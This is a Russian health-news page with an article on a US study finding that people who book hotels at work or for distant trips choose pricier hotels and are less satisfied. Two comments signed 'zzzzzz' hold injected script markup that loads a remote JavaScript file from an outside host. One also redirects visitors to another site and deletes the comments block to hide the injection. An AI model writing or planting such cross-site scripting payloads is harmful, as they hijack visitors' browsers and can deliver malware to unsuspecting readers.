Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если хотите отдохнуть хор...  >>  Если хотите отдохнуть хорошо, не заказывайте отель во время работы!
 
Обратная связь
 

Если хотите отдохнуть хорошо, не заказывайте отель во время работы!

Размер шрифта
20 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что посещение туристических сайтов на рабочем месте огорчает не только вашего начальника, но и ваш кошелек.

Если хотите отдохнуть хорошо, не заказывайте отель во время работы!

Именно к такому выводу пришли исследователи из двух американских вузов: университета Райса (штат Техас) и университета штата Айова.

Они использовали данные крупнейших сайтов для бронирования гостиниц. Авторов интересовало качество отелей, выбираемых потребителями для своего отпуска, и степень итогового их удовлетворения. Оказалось, что те, кто бронировал гостиницу на рабочем месте, чаще выбирали заведения высших категорий, однако впоследствии разочаровывались. Вообще говоря, доля людей, прожигающих священные рабочие часы на поиск отеля, превысила 35%.

Авторы убеждены, что их исследование имеет крайне большое значение, с учетом колоссальных финансовых масштабов туристической отрасли: в одних только Соединенных Штатах годовой оборот этой индустрии превысил два триллиона долларов.

В общем и целом, ученые обнаружили три переменные, которые так или иначе влияют на выбор отеля и степень конечного удовлетворения от него. Ими оказались: 1) промежуток времени между бронированием и отпуском, 2) расстояние между городом проживания и местом предполагаемого отпуска, 3) время покупки (рабочее или внерабочее). Авторы объединили все эти параметры в единую эконометрическую модель.

В исследовании анализировались данные, касающиеся 4 582 потребителей, которые бронировали гостиницы в промежутке с января 2008-го года по октябрь 2009-го. Все они оплачивали проживание в номере непосредственно на сайте.

Ученые пришли к выводу, что дальние расстояния и бронирование в рабочие часы не способствуют радостному отдыху: статистика показала, что в этих случаях люди чаще выбирают «многозвездочные» отели, но в итоге оказываются менее довольными, чем те туристы, которые поселились в ту же гостиницу, но при этом проделали менее далекий путь и/или забронировали отель в нерабочие часы.

«Мы считаем, что данное явление можно объяснить тем, что на работе человек чаще чувствует себя уставшим, что явно не способствует принятию взвешенных решений: жажда отдыха в разгар трудового дня становится непреодолимой, что лишает человека способность трезво мыслить при бронировании отеля», – рассказывает доктор Аджай Калра, один из ведущих авторов исследования.

Кроме того, авторы выяснили, что туристы, которые забронировали гостиницу заранее, реже разочаровывались в итоге, чем те недальновидные граждане, которые тянули кота за хвост до последнего. «Согласитесь: когда мы тратим большую сумму денег – сердце буквально-таки кровью обливается. Эта неприятная эмоция угасает со временем, поэтому чем раньше вы забронируете номер, тем больше шанс того, что горечь финансовой утраты не омрачит ваш отпуск», – говорит доктор Калра.

Подводя итог: рецепт грамотного бронирования гостиницы выглядит следующим образом – делайте это заранее и ни в коем случае не на работе! И ваш отпуск пройдет на ура!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:50

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?   Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.